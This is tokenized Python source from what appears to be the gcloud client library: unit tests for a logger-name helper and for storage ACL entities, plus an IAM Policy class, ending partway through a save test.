<s> import unittest2 <EOL> class Test_logger_name_from_path ( unittest2 . TestCase ) : <EOL> def _callFUT ( self , path , project ) : <EOL> from gcloud . logging . _helpers import logger_name_from_path <EOL> return logger_name_from_path ( path , project ) <EOL> def test_w_simple_name ( self ) : <EOL> LOGGER_NAME = '<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> PATH = '<STR_LIT>' % ( PROJECT , LOGGER_NAME ) <EOL> logger_name = self . _callFUT ( PATH , PROJECT ) <EOL> self . assertEqual ( logger_name , LOGGER_NAME ) <EOL> def test_w_name_w_all_extras ( self ) : <EOL> LOGGER_NAME = '<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> PATH = '<STR_LIT>' % ( PROJECT , LOGGER_NAME ) <EOL> logger_name = self . _callFUT ( PATH , PROJECT ) <EOL> self . assertEqual ( logger_name , LOGGER_NAME ) </s>
<s> """<STR_LIT>""" <EOL> OWNER_ROLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> EDITOR_ROLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> VIEWER_ROLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> class Policy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , etag = None , version = None ) : <EOL> self . etag = etag <EOL> self . version = version <EOL> self . owners = set ( ) <EOL> self . editors = set ( ) <EOL> self . viewers = set ( ) <EOL> @ staticmethod <EOL> def user ( email ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( email , ) <EOL> @ staticmethod <EOL> def service_account ( email ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( email , ) <EOL> @ staticmethod <EOL> def group ( email ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( email , ) <EOL> @ staticmethod <EOL> def domain ( domain ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( domain , ) <EOL> @ staticmethod <EOL> def all_users ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ staticmethod <EOL> def authenticated_users ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def from_api_repr ( cls , resource ) : <EOL> """<STR_LIT>""" <EOL> version = resource . get ( '<STR_LIT:version>' ) <EOL> etag = resource . get ( '<STR_LIT>' ) <EOL> policy = cls ( etag , version ) <EOL> for binding in resource . get ( '<STR_LIT>' , ( ) ) : <EOL> role = binding [ '<STR_LIT>' ] <EOL> members = set ( binding [ '<STR_LIT>' ] ) <EOL> if role == OWNER_ROLE : <EOL> policy . owners = members <EOL> elif role == EDITOR_ROLE : <EOL> policy . editors = members <EOL> elif role == VIEWER_ROLE : <EOL> policy . viewers = members <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % ( role , ) ) <EOL> return policy <EOL> def to_api_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> resource = { } <EOL> if self . etag is not None : <EOL> resource [ '<STR_LIT>' ] = self . etag <EOL> if self . version is not None : <EOL> resource [ '<STR_LIT:version>' ] = self . 
version <EOL> bindings = [ ] <EOL> if self . owners : <EOL> bindings . append ( <EOL> { '<STR_LIT>' : OWNER_ROLE , '<STR_LIT>' : sorted ( self . owners ) } ) <EOL> if self . editors : <EOL> bindings . append ( <EOL> { '<STR_LIT>' : EDITOR_ROLE , '<STR_LIT>' : sorted ( self . editors ) } ) <EOL> if self . viewers : <EOL> bindings . append ( <EOL> { '<STR_LIT>' : VIEWER_ROLE , '<STR_LIT>' : sorted ( self . viewers ) } ) <EOL> if bindings : <EOL> resource [ '<STR_LIT>' ] = bindings <EOL> return resource </s>
<s> import unittest2 <EOL> class Test_ACLEntity ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> return _ACLEntity <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor_default_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> self . assertEqual ( entity . type , TYPE ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_ctor_w_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = self . _makeOne ( TYPE , ID ) <EOL> self . assertEqual ( entity . type , TYPE ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test___str__no_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> self . assertEqual ( str ( entity ) , TYPE ) <EOL> def test___str__w_identifier ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = self . _makeOne ( TYPE , ID ) <EOL> self . assertEqual ( str ( entity ) , '<STR_LIT>' % ( TYPE , ID ) ) <EOL> def test_grant_simple ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> def test_grant_duplicate ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( ROLE1 ) <EOL> entity . grant ( ROLE2 ) <EOL> entity . grant ( ROLE1 ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE1 , ROLE2 ] ) ) <EOL> def test_revoke_miss ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = self . 
_makeOne ( TYPE ) <EOL> entity . revoke ( ROLE ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_revoke_hit ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( ROLE1 ) <EOL> entity . grant ( ROLE2 ) <EOL> entity . revoke ( ROLE1 ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE2 ] ) ) <EOL> def test_grant_read ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant_read ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ entity . READER_ROLE ] ) ) <EOL> def test_grant_write ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant_write ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ entity . WRITER_ROLE ] ) ) <EOL> def test_grant_owner ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant_owner ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ entity . OWNER_ROLE ] ) ) <EOL> def test_revoke_read ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( entity . READER_ROLE ) <EOL> entity . revoke_read ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_revoke_write ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( entity . WRITER_ROLE ) <EOL> entity . revoke_write ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> def test_revoke_owner ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> entity = self . _makeOne ( TYPE ) <EOL> entity . grant ( entity . OWNER_ROLE ) <EOL> entity . revoke_owner ( ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( ) ) <EOL> class Test_ACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . 
acl import ACL <EOL> return ACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> def test__ensure_loaded ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . _really_loaded = True <EOL> acl . reload = _reload <EOL> acl . _ensure_loaded ( ) <EOL> self . assertTrue ( acl . _really_loaded ) <EOL> def test_client_is_abstract ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> self . assertRaises ( NotImplementedError , lambda : acl . client ) <EOL> def test_reset ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> acl . reset ( ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> def test___iter___empty_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> def test___iter___empty_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test___iter___non_empty_no_roles ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> def test___iter___non_empty_w_roles ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> self . 
assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ( TYPE , ID ) , '<STR_LIT>' : ROLE } ] ) <EOL> def test___iter___non_empty_w_empty_role ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> entity . grant ( '<STR_LIT>' ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> def test_entity_from_dict_allUsers_eager ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity_from_dict ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_from_dict_allAuthenticatedUsers ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity_from_dict ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_from_dict_string_w_hyphen ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity_from_dict ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( entity . type , '<STR_LIT:type>' ) <EOL> self . assertEqual ( entity . identifier , '<STR_LIT:id>' ) <EOL> self . 
assertEqual ( entity . get_roles ( ) , set ( [ ROLE ] ) ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_from_dict_string_wo_hyphen ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertRaises ( ValueError , <EOL> acl . entity_from_dict , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ ] ) <EOL> def test_has_entity_miss_str_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertFalse ( acl . has_entity ( '<STR_LIT>' ) ) <EOL> def test_has_entity_miss_str_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertFalse ( acl . has_entity ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_has_entity_miss_entity ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertFalse ( acl . has_entity ( entity ) ) <EOL> def test_has_entity_hit_str ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( '<STR_LIT>' % ( TYPE , ID ) ) ) <EOL> def test_has_entity_hit_entity ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( entity ) ) <EOL> def test_get_entity_miss_str_no_default_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . 
assertEqual ( acl . get_entity ( '<STR_LIT>' ) , None ) <EOL> def test_get_entity_miss_str_no_default_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertEqual ( acl . get_entity ( '<STR_LIT>' ) , None ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_get_entity_miss_entity_no_default ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertEqual ( acl . get_entity ( entity ) , None ) <EOL> def test_get_entity_miss_str_w_default ( self ) : <EOL> DEFAULT = object ( ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertTrue ( acl . get_entity ( '<STR_LIT>' , DEFAULT ) is DEFAULT ) <EOL> def test_get_entity_miss_entity_w_default ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> DEFAULT = object ( ) <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertTrue ( acl . get_entity ( entity , DEFAULT ) is DEFAULT ) <EOL> def test_get_entity_hit_str ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( '<STR_LIT>' % ( TYPE , ID ) ) ) <EOL> def test_get_entity_hit_entity ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( entity ) ) <EOL> def test_add_entity_miss_eager ( self ) : <EOL> from gcloud . storage . 
acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . add_entity ( entity ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_add_entity_miss_lazy ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> acl . add_entity ( entity ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_add_entity_hit ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ENTITY_VAL = '<STR_LIT>' % ( TYPE , ID ) <EOL> ROLE = '<STR_LIT>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> before = acl . entity ( TYPE , ID ) <EOL> acl . add_entity ( entity ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertFalse ( acl . get_entity ( ENTITY_VAL ) is before ) <EOL> self . assertTrue ( acl . get_entity ( ENTITY_VAL ) is entity ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . 
get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_miss ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . loaded ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_hit ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> before = acl . entity ( TYPE , ID ) <EOL> before . grant ( ROLE ) <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( entity is before ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_user ( self ) : <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . user ( ID ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT:user>' ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ID , '<STR_LIT>' : ROLE } ] ) <EOL> def test_group ( self ) : <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . group ( ID ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ID , '<STR_LIT>' : ROLE } ] ) <EOL> def test_domain ( self ) : <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . 
loaded = True <EOL> entity = acl . domain ( ID ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ID , '<STR_LIT>' : ROLE } ] ) <EOL> def test_all ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . all ( ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> def test_all_authenticated ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . all_authenticated ( ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> def test_get_entities_empty_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertEqual ( acl . get_entities ( ) , [ ] ) <EOL> def test_get_entities_empty_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertEqual ( acl . get_entities ( ) , [ ] ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_get_entities_nonempty ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertEqual ( acl . get_entities ( ) , [ entity ] ) <EOL> def test_reload_missing ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> connection = _Connection ( { } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . 
reload_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' , ROLE ) <EOL> acl . reload ( client = client ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:GET>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> def test_reload_empty_result_clears_local ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . reload_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' , ROLE ) <EOL> acl . reload ( client = client ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:GET>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> def test_reload_nonempty_result ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> connection = _Connection ( <EOL> { '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . reload_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . reload ( client = client ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:GET>' ) <EOL> self . 
assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> def test_save_none_set_none_passed ( self ) : <EOL> connection = _Connection ( ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . save ( client = client ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:0> ) <EOL> def test_save_existing_missing_none_passed ( self ) : <EOL> connection = _Connection ( { } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save ( client = client ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_save_no_acl ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> AFTER = [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] <EOL> connection = _Connection ( { '<STR_LIT>' : AFTER } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' ) . grant ( ROLE ) <EOL> acl . save ( client = client ) <EOL> self . assertEqual ( list ( acl ) , AFTER ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : AFTER } ) <EOL> self . 
assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_save_w_acl ( self ) : <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> STICKY = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE2 } <EOL> new_acl = [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE1 } ] <EOL> connection = _Connection ( { '<STR_LIT>' : [ STICKY ] + new_acl } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save ( new_acl , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( STICKY in entries ) <EOL> self . assertTrue ( new_acl [ <NUM_LIT:0> ] in entries ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' 